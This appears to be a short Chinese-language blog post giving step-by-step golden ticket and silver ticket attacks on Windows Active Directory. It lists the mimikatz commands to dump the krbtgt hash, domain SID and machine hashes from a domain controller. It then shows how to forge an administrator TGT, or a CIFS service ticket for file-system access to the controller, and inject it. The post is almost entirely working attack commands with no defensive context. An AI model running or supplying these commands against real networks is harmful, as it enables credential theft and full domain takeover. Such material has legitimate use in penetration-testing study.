票据传递攻击

黄金票据攻击

  1. 登陆域控,dump Krbtgt用户hash和域sid,
    privilege::debug
    lsadump::lsa /patch

获取域信息

  1. 切换到普通域用户的机器,生成TGT凭证,用户名为administrator
    mimi下执行kerberos::golden /user:administrator /domain:xxx.com /sid:xx-xx-xx-xx /krbtgt:Hash值 /ticket

  1. 然后使用mimikatz将凭证注入进去,攻击成功:
    mimikatz # kerberos::ptt Administrator.kirbi

白银票据攻击

  1. 首先登录域控,dump机器hash
    privilege::debug
    sekurlsa::logonpasswords

  1. 将hash保存下来,在普通域用户机器中进行ptt
    mimi下执行kerberos::golden /domain:next.com /sid:xx-xx-xx-xx /target:172.18.16.171 /rc4:NTML Hash /service:cifs /user:user1 /ptt,这里的cifs是指的文件共享服务,有了cifs服务权限,就可以访问域控制器的文件系统

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!